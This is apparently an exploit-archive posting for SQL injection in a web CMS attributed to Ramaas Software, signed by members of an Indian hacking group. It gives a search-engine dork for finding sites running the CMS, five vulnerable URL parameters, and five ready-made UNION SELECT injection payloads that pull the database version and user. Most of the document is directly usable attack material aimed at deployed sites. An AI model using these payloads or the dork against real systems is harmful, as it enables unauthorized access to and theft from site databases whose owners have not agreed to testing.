54 lines
No EOL
1.6 KiB
Text
54 lines
No EOL
1.6 KiB
Text
# Exploit Title: Ramaas Software CMS SQL Injection Vulnerability
|
|
# Version: Web Application
|
|
# Tested on: Apcahe/Unix
|
|
# Dork : intext:"Powered by Ramaas Software"
|
|
# Code :
|
|
---------------------------------------------------------------------------------------
|
|
############################################################################
|
|
#Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber
|
|
Warriors]
|
|
#Thanks:
|
|
SaiSatish,FB1H2S,Godwin_Austin,Micr0,Mannu,Harin,Jappy,Dark_Blue,Hoodlum
|
|
#Shoutz: hg_H@x0r,r45c4l,Yash,Hackuin,unn4m3d
|
|
#Catch us at www.andhrahackers.com or www.teamicw.in
|
|
############################################################################
|
|
|
|
|
|
This Is The CMS Created by The Leading WebDevelopment Company ramaas.com For
|
|
There Clients and all have same
|
|
|
|
vulnerability.....
|
|
|
|
Exploited Link :
|
|
|
|
1) http://example.com/display_agents.php?id=243'
|
|
|
|
2) http://example.com/view.php?articleid=14567'
|
|
|
|
3) http://example.com/view_businessnews.php?articleid=7'
|
|
|
|
4) http://example.com/view_article.php?articleid=12242'
|
|
|
|
5) http://example.com/article.php?articleid=111'
|
|
|
|
|
|
Demo :
|
|
|
|
1)
|
|
http://example.com/display_agents.php?id=-243+union+select+all+1,2,3,version(),5,user(),7,8--
|
|
|
|
2)
|
|
http://example.com/view.php?articleid=-14567+union+select+all+1,2,3,version(),5,user(),7,8,9,10--
|
|
|
|
3)
|
|
http://example.com/view_businessnews.php?articleid=-7+union+select+all+1,2,3,version(),user(),6,7,8,9--
|
|
|
|
4)
|
|
http://example.com/view_article.php?articleid=-12242+union+select+all+1,2,3,version(),user(),6,7,8,9--
|
|
|
|
5)
|
|
http://example.com/article.php?articleid=-111+union+select+all+1,2,3,version(),5,user(),7,8,9,10,11--
|
|
|
|
|
|
|
|
#41.w4r10r mailto:41.w4r10r@andhrahackers.com |